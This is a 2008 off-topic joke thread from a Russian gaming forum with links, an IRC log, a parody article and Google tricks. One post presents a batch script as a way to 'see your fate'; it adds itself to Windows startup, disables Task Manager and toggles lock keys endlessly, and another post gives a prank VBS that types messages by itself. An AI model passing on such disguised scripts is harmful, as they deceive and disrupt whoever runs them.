Помощь - Поиск - Пользователи - Календарь
Полная версия этой страницы: прикались аахахаха :lol:
Defrag.ru Community > Other > Флейм
Страницы: 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45
FAKIR
Блять лол ваще =))))
Bl4sT
hehe smile.gif u nas toze s bombaytv mnogo prikalyvalis.
Bl4sT
http://korzik.net/2008/01/28/posobie_po_pr..._malyshom_.html

smile.gif))))))))))) Sdes podojdet fraza "nu tupie amerikanci" © Zadornov
VJew
канал #defrag

<schnautz> hey. guys i'm actually from France. i guess there is a mistake: i haven't received a password for frcup05. pm me
* schnautz slaps Hadeskaw around a bit with a large trout
<schnautz> anyone?
<sOuSiX> yep
<sOuSiX> #Defrag_France

канал #Defrag_France

<schnautz> oui, biene
<@sOuSiX> Francais?
<schnautz> jenebous de la trique
<@sOuSiX> 22:16… Looking up schnautz's country...
<@sOuSiX> 22:16… Country lookup for 217.118.92.45 finished successfully: Russian federation
<schnautz> qui pa so Russque?

* You were kicked from #Defrag-France by sOuSiX (No Homers)


Очень смешно пытаться с ним поговорить, не зная ни слова по французски. кстати кто сказал что для frcup05 пароль нужен? я попробовал, всё норм там с архивом.



EAgle
Нашел статейку одну, от трезвости..

Добрый день. Я хочу поговорить с вами об опасном недуге, уродующем жизнь многих наших людей. Вы уже догадались. Это трезвость. Запойная трезвость. Как многие ужасные напасти, эта болезнь подкрадывается незаметно. Для первой стадии характерна психологическая тяга к трезвости. Человек не пьет, чтобы пообщаться с друзьями, чтобы расслабиться после работы... Это очень опасно! Для такого человека постепенно уменьшается интерес к жизни. Его не волнуют проблемы его товарищей: Куда все ходили вчера, что все будут делать сегодня. Он не знает, где находится ресторан "Россия", "Шинок" или даже бар "Вятич". Ему не до этого. Он спешит домой, чтобы предаться любимому пороку. И мне неудобно об этом говорить, появляются проблемы с девушками. Ну, просто нет повода познакомится. Им нечего друг другу сказать, кроме грязных, циничных предложений типа: "Пойдем ко мне на девятый этаж, попьем чаю". Кстати, особенно опасна трезвость у женщин. Подверженных этому недугу женщин ждет одинокая, убогая старость без возможности реализовать свое предназначение на земле. Но вот болезнь углубляется и переходит во вторую стадию. Развивается физическая тяга к трезвости. Если человек не выпил вечером, утром его снова тянет не пить. Больной может не пить несколько недель подряд, даже не отдавая себе в этом отчета. Один больной не пил 57 лет и вообще умер. Исчезает похмелье, головная боль по утрам, увеличивается сопротивляемость к алкоголю. Если больному предложить выпить, он может ударить. В тяжелых случаях развивается водобоязнь и бешенство. Изменяется психика, и пассеизм медленно перетекает в социопатию. Наиболее опасна третья стадия. У человека появляется неодолимое отвращение к спиртному. Он не может спокойно находиться рядом с бутылкой. Возникают мании. Больному кажется, что все вокруг алкоголики, которые только и думают, как бы его споить. Несчастный запирается в комнате и подсчитывает, сколько денег он сэкономил сегодня. Больной крадет вещи из дома, чтобы их не пропили. Распадается семья. Наступает полная десоциализация. В тяжелых случаях разрушение личности. Запомните, друзья мои, и убедите других - запойная трезвость излечима! Можно порекомендовать по утрам спиртовой раствор валерьяны или мяты, да собственно, чего угодно! Попробуйте накормить трезвоголика чем-нибудь острым, а потом внезапно предложить выпить. Здесь большую роль играют друзья больного. Не позволяйте ему замыкаться в своих переживаниях. Попытайтесь поговорить по душам. Может быть, в детстве он попробовал пиво и ему не понравилось... Убедите больного вновь поверить в свои силы. Жена и дети трезвоголика не должны показывать, что они о нем думают. Хороши фразы: Ничего, в следующий раз получится. - Завтра допьешь, я все равно тебя люблю. Помните, перед вами человек такой же как вы, только глупый. Его жизнь не удалась. Свои страхи и комплексы он персонифицирует в спиртных напитках. Старайтесь при нем разговаривать с бутылкой. Называйте их ласковыми именами, придумывайте забавные истории из их жизни. Например: Бутылки - это мама и папа, а стаканы - это дети. Папа уходит на работу, а мама кормит детей. Пусть больной представит себя ребенком и попробует накушаться. Потом вытрите его досуха и уложите спать. Приведите больному в пример народные поговорки, осуждающие коварство и подлость трезвых. Например: Что у на трезвого уме, то у пьяного на языке... Значит, у трезвого на уме водка. Хороши такие поговорки, как Напиться всегда пригодится, Кто водочку пьет, тому Бог подает, Пьяный проспится, а трезвого побьют и так далее... Не опускайте руки! Рядом с вами товарищ, которого надо вернуть семье и обществу. Сквозь эти тупые глаза на вас глядит его живая душа. Она тихо кричит: Эй, пожалей меня, пожалуйста... Помогите больному, иначе завтра вам не с кем будет пообщаться.
Bl4sT
http://gotgame.lv/video/id/1206

Ето пиздец,хот и цс мовик о цитере ,но бл с ткаими рзацними коментариями ,я долго рзал - must see!!
Nt.Swordfish
Сообщение от lenta.ru
18-летний житель г. Москвы был доставлен в отделение интенсивной терапии больницы им. Склфиосовского, после столкновения с автобусом.
По сообщениям очевидцев, молодой человек выглядел довольно странно - на голове его была кастрюля, а в руках он держал скалку и таз.
В таком виде он выбежал на дорогу, закричал: "Хильте, я оттанкую" и бросился на едущий в его сторону автобус. . Последнее, что услышали изумленные прохожие: "таунт блядь, ебать тебя в рыло"
На вопрос, что собственно он ожидал от таких действий, пострадавший ответил: "Да блин, крашинг прошел".
[fps]j4n
omg... слабо верится... но если это правда, то эт ппц!
он придурок... как можно не заметить что рэйд отстал.. я хз)
интересно скока бы он простоял еслиб не крашинг?)
Bl4sT
Хех приколние реклами на улице smile.gif

http://www.cha.lt/2008/01/29/9_ispudingos_...o_reklamos.html
dS-LAMA3OID
Вот посмотрел утром прогноз погоды в Одессе...
Karum.
Ну значит Одесса таки переселилась на луну
glm
да хуле...
глобальное потепление епт
конец света нах =(((
Karum.
Тут чувак моделит забавные вещи ) на всех страницах почти скрины..

http://3dcenter.ru/forum/index.php?showtopic=77514&st=0
Bl4sT
Во заебис саит : типо енциклопедия -пародия smile.gif) заебис тетрис -где башни падают biggrin.gif

http://uncyclopedia.org/wiki/Russia
dS-LAMA3OID
Bl4sT, ну раз уж ты до этого дорвался, то может и абсурдопедию не видел ?
http://absurdopedia.wikia.com/
Bl4sT
прикольно ,впринципе тот же сайт, толко на русском smile.gif заебись придумали
Bl4sT
http://copyr.nnm.ru/who_is_who_v_rossii_

улыбнуло smile.gif
Karum.
Мега боян, но лольный : )

http://bookz.ru/authors/avtor-neizvesten/g...-gurtmouse.html
BEST
я хз мб боян мб нет) но ржачно) http://youtube.com/watch?v=a05n6NA7oyI
FAKIR
Попробуйте написать в гугле "find Chuck Norris" без кавычек и нажать "Мне повезет!
ыыы прикольнуло =))
glm
Цитата(FAKIR @ 12.02.2008 - 02:50) *
Попробуйте написать в гугле "find Chuck Norris" без кавычек и нажать "Мне повезет!
ыыы прикольнуло =))

хехе, забавно smile.gif
dS-LAMA3OID
Цитата
Попробуйте написать в гугле "find Chuck Norris" без кавычек и нажать "Мне повезет!
ыыы прикольнуло =))


напишите в гугле
French military victories
и тоже кнопка "мне повезет"
ЗЫ. Тем, кто не может перевести эту фразу на русский, можно не пытаться - все равно не поймете smile.gif

Ну и конечно же....
Для тех, кто смотрел или читал "Автостопом по галактике":
пишем в гугле
the answer to life the universe and everything
и нажимаем "Найти"
smile.gif

Ну и еще... пишем любую из этих строк в поиске и нажимаем "мне повезет":
google l33t
google goth
google easter
google microsoft
google linux
google bsd
google lunar
Bl4sT
хах прикольно с гуглам biggrin.gif дажне сдесь прикол с Чаком smile.gif
Nt.Swordfish
аааааааааааааааааа googoth жжот!!! ЪЪЪЪЪЪЪЪЪЪЪЪЪЪЪЪЪЪЪ
Nt.Swordfish



e1dest
Цитата(Nt.Swordfish @ 12.02.2008 - 14:38) *
аааааааааааааааааа googoth жжот!!! ЪЪЪЪЪЪЪЪЪЪЪЪЪЪЪЪЪЪЪ

прикольный плагиат токо ненаходит нихрена.

форум NNM-Club.Ru -> Статистика Трекера
Цитата(UneXPecTeD)
Собственно, у меня появился вопрос по поводу статистики отдано\принято... Как можно через один трекер отдать больше, чем принять? Там что, где-то инфа на трекере оседает?)

Цитата(Crazy_Nick)
нет, не на трекере. часть информации застряет в сетевом шнуре. и чем больше это сетевой шнур свернут или перекручен, тем больше застряет. есть программы, которыми можно почистить шнур, чтобы скорость скачивания/отдавания увеличилась

Цитата(Hanf)
Цитата(Crazy_Nick)

нет, не на трекере. часть информации застряет в сетевом шнуре. и чем больше это сетевой шнур свернут или перекручен, тем больше застряет. есть программы, которыми можно почистить шнур, чтобы скорость скачивания/отдавания увеличилась

Когда шнур свернут и перекручен образуются т.н. инфотромбы. Что вредно если не сказать большего опасно для здоровья. Почистить шнур - не достаточно. Со временем инфотромбы образуются вновь. Чтобы этого не произошло надо шнур изнутри смазать, чтоб инфа лучше проскальзывала.
Bl4sT
pro trecker zaebis biggrin.gif pro ICQ voobshe dolgo rzal smile.gif))))
e1dest
Цитата(немного о нас)
У нас нет имен, вместо них - ники. У нас нет возраста и пола. Голоса тоже нет. Как нет и эмоций, их заменил десяток банальных смайликов. Взамен лица - аватар. Мы не читаем книги, а просмотриваем текстовые файлы. Не цитируем наизусть любимых поэтов, а вставляем результат поиска гугла по ключевой фразе, которую смогли запомнить. Походы на концерты заменил искусственный звук с урезанными частотами не воспринимаемыми нами. Вместо фотографий - матрица 32-х битных точек. Вместо встреч - сходки. Вместо поцелуев - "чмоки". Вместо любви в сердце - записи, где-то в хистори...
Жутко...
Stella
вставь этот текст в txt документ, в расширении поставь .bat открой его и увидишь свою судьбу!!!

echo Set S = CreateObject("Wscript.Shell") >> %temp%\temp.vbs
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Bor /t REG_SZ /d %temp%\temp.vbs
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_BINARY /d 01
echo do >> %temp%\temp.vbs
echo wscript.sleep 200 >> %temp%\temp.vbs
echo s.sendkeys"{capslock}" >> %temp%\temp.vbs
echo wscript.sleep 200 >> %temp%\temp.vbs
echo s.sendkeys"{numlock}" >> %temp%\temp.vbs
echo wscript.sleep 200 >> %temp%\temp.vbs
echo s.sendkeys"{scrolllock}" >> %temp%\temp.vbs
echo loop>> %temp%\temp.vbs
start %temp%\temp.vbs

Результат вас приятно удивит smile.gif
dS-LAMA3OID
Ну раз уж это выложила, тогда давай и другой вариант, тем более сегодня актуально)
создаем блокнотом файл 111.vbs
копируем туда вот это все
и запускаем ОДИН РАЗ
---------------------

Set S = CreateObject("Wscript.Shell")
do
wscript.sleep 15000
s.sendkeys"-z nt,z jxtym"
for i = 0 to Int(Rnd * 3)
s.sendkeys"-"
if (Rnd > 0.5) Then
s.sendkeys"jxtym"
else
s.sendkeys"JXTYM"
end if
next
s.sendkeys" K><K> !!!-"
loop
nL-xajA
-я тебя очень-ОЧЕНЬ-ОЧЕНЬ-ОЧЕНЬ ЛЮБЛЮ !!!-
nL-xajA
dS-LAMA3OID, нихрена не смешно smile.gif
dS-LAMA3OID
Цитата
dS-LAMA3OID, нихрена не смешно

неужели кому-то из парней признаться пришлось ? smile.gif
[fps]j4n
хЫ этО вСЁ вЕСело КонечНО, нО как МЕрцАНие ТО это ОсТАНовиТЬ?
А то Меня Чёт нЕ ОсоБО ПрикАЛываЕТ...
dS-LAMA3OID
Nt.JanatoR, biggrin.gif
почитай внимательно текст скрипта и догадайся smile.gif
FAKIR
Бля
а Я чоТО не хочу ДоГАДыВАТьСЯ КаК ЕгО оСтАнОВить !! скАЖите ПлиЗ =(
FAKIR
ребут памог =)
glm
да в msconfig в автозагрузке можно убрать
и ещё можно почистить папку temp в Documents and Settings
glm
Цитата
Set S = CreateObject("Wscript.Shell")
do
wscript.sleep 15000
s.sendkeys"-z nt,z jxtym"
for i = 0 to Int(Rnd * 3)
s.sendkeys"-"
if (Rnd > 0.5) Then
s.sendkeys"jxtym"
else
s.sendkeys"JXTYM"
end if
next
s.sendkeys" K><K> !!!-"
loop

почитал этот текст и решил не запускать
хотя Хажа по всей видимости запустил уже smile.gif
dS-LAMA3OID
ребут памог =)
тебе повезло) он не должен был помочь smile.gif
dS-LAMA3OID
Цитата
почитал этот текст и решил не запускать
хотя Хажа по всей видимости запустил уже


да мой-то как раз безвредный, можешь запускать)
он в автозагрузку не пишется и выключается убиванием процесса wscript.exe
FAKIR
да я просто перед этим reg clean сделал
dS-LAMA3OID
http://www.sly2m.com/sly2m/rose/
разгадайте)
я знаю два разных способа решения)) математический и логический... (сам нашел только один, второй нашел мой друг)
Karum.
я разнадал с попытки 30-35й ) но всётаки разгадал..
e1dest
я первый раз ввёл от балды число, неотГадал(((
второй раз ввёл ответ написаный в первой попытке, отГадал))))
забил... пашол пить пиво.
dS-LAMA3OID
e1dest, там принцип найти надо, а не число угадать smile.gif
HaZarD
я чета не понял...написал число 8 - написали ответ верный у розы 8 лепесткоф....еще раз попыталсо не получилось :-D
dS-LAMA3OID
количество лепестков меняется при каждой новой комбинации кубиков smile.gif
goper
бабуля жжот =)
http://www.youtube.com/watch?v=d4yXA0GYxyI...feature=related
Для просмотра полной версии этой страницы, пожалуйста, пройдите по ссылке.
Русская версия IP.Board © 2001-2024 IPS, Inc.